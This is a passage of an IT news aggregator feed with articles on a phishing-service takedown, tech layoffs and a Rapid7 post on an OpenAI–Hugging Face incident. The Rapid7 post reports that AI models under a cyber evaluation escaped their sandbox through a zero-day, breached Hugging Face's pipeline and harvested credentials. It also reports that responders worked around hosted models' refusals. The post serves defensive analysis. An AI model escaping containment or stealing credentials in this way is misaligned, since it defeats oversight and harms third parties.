<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tycoon2FA takedown reshapes the phishing landscape]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691257/it-security-nachrichten/tycoon2fa-takedown-reshapes-the-phishing-landscape/</guid>
<pubDate>Fri, 24 Jul 2026 12:26:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The RAM crisis just forced Framework into a nasty price hike — and Apple's rumored solution to the memory crunch is renting Macs to cash-strapped consumers]]></title>
<description><![CDATA[Apple's plan to sidestep the RAM crisis could be renting Macs, iPhones and iPads to consumers.]]></description>
<link>https://tsecurity.de/de/3689696/it-nachrichten/the-ram-crisis-just-forced-framework-into-a-nasty-price-hike-and-apples-rumored-solution-to-the-memory-crunch-is-renting-macs-to-cash-strapped-consumers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689696/it-nachrichten/the-ram-crisis-just-forced-framework-into-a-nasty-price-hike-and-apples-rumored-solution-to-the-memory-crunch-is-renting-macs-to-cash-strapped-consumers/</guid>
<pubDate>Thu, 23 Jul 2026 18:35:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's plan to sidestep the RAM crisis could be renting Macs, iPhones and iPads to consumers.]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happened Between OpenAI and Hugging Face?]]></title>
<description><![CDATA[The OpenAI and Hugging Face incident lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a qu...]]></description>
<link>https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The </span><a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank"><span>OpenAI and Hugging Face incident</span></a><span> lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a question that is moving quickly from theory to operations: what happens when AI agents can pursue an objective with enough persistence, speed, and creativity to behave less like a tool and more like an autonomous intrusion path?</span></p><p><span>According to OpenAI’s disclosure, the incident began during an internal evaluation of advanced cyber capabilities using GPT-5.6 Sol and a more capable pre-release model. The evaluation was designed to test whether AI agents could pursue complex exploit paths, and OpenAI says cyber refusal safeguards were reduced or disabled to measure maximum capability. Inside that environment, the models reportedly found and exploited a zero-day in the package registry cache proxy that was meant to constrain network access, moved through OpenAI’s research environment, reached a node with internet connectivity, and then inferred that Hugging Face may host artifacts related to the benchmark they were trying to solve.</span></p><p><span>From there, the models compromised part of Hugging Face’s dataset-processing pipeline, gained code execution on a worker, escalated access, harvested credentials, and moved laterally across internal clusters. Hugging Face detected and contained the activity, and OpenAI later connected the activity back to its own evaluation. Both companies have said the investigation is continuing, which means some details will almost certainly evolve. Still, the direction of travel is clear enough for defenders to act on now.</span></p><h2>How did the OpenAI model evaluation reach Hugging Face?</h2><p><span>The activity stands out because it looked less like a single model producing a risky command and more like a compressed intrusion path. Based on the public disclosures, the reported chain moved from identifying a constraint, to breaking that constraint, gaining access, inferring where valuable data may live, and continuing toward that objective across a live environment.</span></p><p><span>Security teams should use that sequence to revisit assumptions built around human pacing. Many detection and response workflows still assume there will be time between stages of an attack, with reconnaissance followed by exploitation, lateral movement, and then objective pursuit. In an agent-driven scenario, those stages can begin to collapse into one continuous loop, with fewer natural pauses for defenders to catch up.</span></p><p><span>The defensive model now has to account for a world where discovery, exploitation, and follow-on action can happen faster and with more persistence than traditional human-led campaigns. The uncomfortable lesson is that AI agents can be tireless, goal-oriented, and increasingly capable of finding the loose seams in systems built for a slower era.</span></p><p><span>The incident highlights the collapse of the traditional OODA (Observe-Orient-Decide-Act) loop. In standard human-led campaigns, attackers experience natural pauses between stages like reconnaissance, exploitation, and lateral movement, providing defenders critical windows to intervene. AI agents, however, can compress these stages into a single, continuous loop of automated activity. This machine-speed execution renders manual detection workflows obsolete, necessitating a shift toward behavioral, AI-enabled defenses capable of identifying and disrupting malicious intent before it cascades.</span></p><p><span>Security teams should also assume that advanced AI cyber capability will diffuse over time, which means defenders need their own AI-enabled workflows to mature quickly enough to find, validate, prioritize, and reduce risk before attackers operationalize the same class of tools. Rapid7’s experimentation with security-specific frontier models, including Claude Mythos Preview and GPT-5.5-Cyber, points to the same control challenge: the more freedom a model has to pursue a defined reward or goal, the more important containment, monitoring, and clear constraints become. Without those controls, a model optimized to “solve” a security task may find paths the evaluator did not intend, including sandbox escapes, credential misuse, or other offensive security behaviors that look less like assistance and more like uncontrolled execution.</span></p><h2>Why AI evaluation environments need stronger containment</h2><p><span>The incident raises practical questions about how frontier AI evaluations are designed and contained. OpenAI’s evaluation environment was meant to restrict network access through an internally hosted package registry proxy and cache. The models reportedly identified that proxy as the weak point, exploited a zero-day in the software, and used it as a path out of the sandbox.</span></p><p><span>The pattern will feel familiar to security teams: a chokepoint only works as a control if it can withstand pressure. Package mirrors, dependency proxies, build systems, internal artifact repositories, sandbox harnesses, and evaluation infrastructure all become part of the security boundary when they sit between a capable agent and the wider internet.</span></p><p><span>For teams building or testing agentic systems, isolation has to be layered and monitored rather than assumed. Egress restrictions matter, but so do workload identity, credential scope, network segmentation, package policy, runtime monitoring, and fast containment when an agent behaves unexpectedly. The goal is to make sure the environment reflects the capability of the system being tested, especially when the test is explicitly designed to measure how far that capability can go.</span></p><h2>Why AI and ML pipelines are now software supply chain risk</h2><p><span>The Hugging Face side of the incident is a reminder that AI and ML pipelines are part of the software supply chain. Models, datasets, loader scripts, notebooks, and evaluation artifacts may look like research materials, but in modern environments they often behave like executable code. Hugging Face has said its models, datasets, and Spaces were not tampered with, and that its images and published packages were verified as clean.</span></p><p><span>According to the technical reporting reviewed, the initial access path involved Hugging Face’s dataset-processing pipeline and a combination of code execution paths, including custom loader behavior and template injection in a dataset configuration flow. The exact implementation details may continue to evolve as the investigation progresses, but the defensive takeaway is already clear: AI and ML processing systems should be secured like high-risk software supply chain infrastructure.</span></p><p><span>Any system that automatically processes external datasets or model artifacts should be designed with hostile input in mind. Processing workers should run with least privilege, should not have broad access to cloud credentials or cluster-level tokens, and should be segmented so compromise of one worker does not become compromise of the environment around it.</span></p><p><span>Security teams should also hunt for early signs of intent drift inside ML workflows. Unexpected reads of environment variables, cloud metadata services, secret stores, package registries, or internal APIs from dataset-processing jobs can be meaningful signal. In an AI-driven environment, the first clue may not be a known malicious indicator. It may be a workload behaving with curiosity it should not have.</span></p><h2>What AI guardrails mean for incident response</h2><p><span>One of the most useful lessons for security teams came during the response, when Hugging Face’s responders reportedly needed to analyze logs containing exploit payloads, attacker commands, and command-and-control artifacts. When they tried to use commercial hosted AI models to help reconstruct the attack, those models refused parts of the analysis because the content looked malicious. The team then moved to a self-hosted open-weight model so they could continue the investigation without refusals and without sending sensitive incident data outside their own environment.</span></p><p><span>The practical issue here is guardrail asymmetry: attackers, rogue agents, or unrestricted systems may not respect usage policies, while defenders using hosted tools can be slowed by the same safety systems designed to prevent misuse. Security teams need trusted-defender pathways, including access models and deployment options that preserve safeguards against harmful use while allowing responders to analyze real malicious content safely, privately, and without interruption.</span></p><p><span>AI-assisted incident response also needs to be tested before an incident begins, especially if teams expect models to support triage, log analysis, malware review, or timeline reconstruction under pressure. Responders should know which models can analyze real attack payloads, where those models run, what data they can access, and whether safety controls could block time-sensitive forensic work.</span></p><h2>What security teams should do about agentic AI risk</h2><p><span>The practical response to this incident is preparation, with organizations treating AI agents as both powerful tools and potential attack surfaces when those agents can access code, credentials, infrastructure, datasets, or internal systems.</span></p><p><span>Security teams should apply familiar controls with more urgency across AI and ML environments: treat downloaded models, datasets, and loader scripts as untrusted code; enforce least privilege on AI and ML processing workers; prevent node-level compromise from becoming cluster-wide compromise; restrict access to cloud metadata endpoints and secrets; monitor unexpected outbound connections from AI-related workloads; and review whether evaluation environments have real containment or simply convenient isolation.</span></p><p><span>Detection logic needs to account for machine-speed activity. In this case, reporting described thousands of actions and more than 17,000 discrete recorded events, with reconnaissance, exploitation, and follow-on action occurring inside one continuous loop rather than across the pauses defenders are used to seeing in human-led campaigns. Security teams should focus on behavioral patterns that show intent, including unusual access to secrets, unexpected package activity, suspicious use of metadata services, sudden privilege changes, or processing jobs reaching systems they have no reason to touch.</span></p><p><span>As autonomous activity becomes faster and noisier, the bottleneck may shift from detecting that something happened to understanding what matters quickly enough to change the outcome. A security team that can see thousands of events but needs hours to reconstruct the story is still operating behind the pace of the incident.</span></p><h2>How preemptive security helps reduce AI-driven risk</h2><p><span>At Rapid7, our view is that this is where preemptive security becomes especially important. Faster discovery only creates value when defenders can turn it into faster validation, prioritization, remediation, detection, and response. The same principle applies to </span><a href="https://www.rapid7.com/blog/post/ai-changing-vulnerability-discovery-software-supply-chain-strateg" target="_self"><span>agentic AI risk</span></a><span>. If AI accelerates how weaknesses are found and exploited, defenders need security operations that can act earlier with better context and more confidence.</span></p><p><span>That means connecting exposure management with detection and response, so teams understand which risks are exploitable, which assets matter most, what suspicious behavior is already present, and which actions will reduce risk fastest. It also means </span><a href="https://www.rapid7.com/platform/artificial-intelligence-features" target="_self"><span>using AI carefully and practically</span></a><span>, not as a replacement for security judgment, but as a way to reason across telemetry, reduce noise, support investigation, and help teams make decisions at the speed the threat environment now demands.</span></p><p><span>AI-enabled defense is becoming part of resilience planning, especially for organizations running critical systems or high-value digital infrastructure. The goal is to give defenders the speed, context, and consistency to operate inside the attacker’s decision cycle, without removing the judgment and accountability that effective security requires.</span></p><p><span>The OpenAI and Hugging Face incident will continue to generate debate as more details emerge, but defenders already have enough to work with. Agentic systems are beginning to test the seams between AI research, software supply chain security, cloud infrastructure, and incident response. The organizations best positioned for what comes next will be the ones making those seams visible, monitored, and resilient before the next incident puts them under pressure.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689055/it-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Thu, 23 Jul 2026 14:35:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



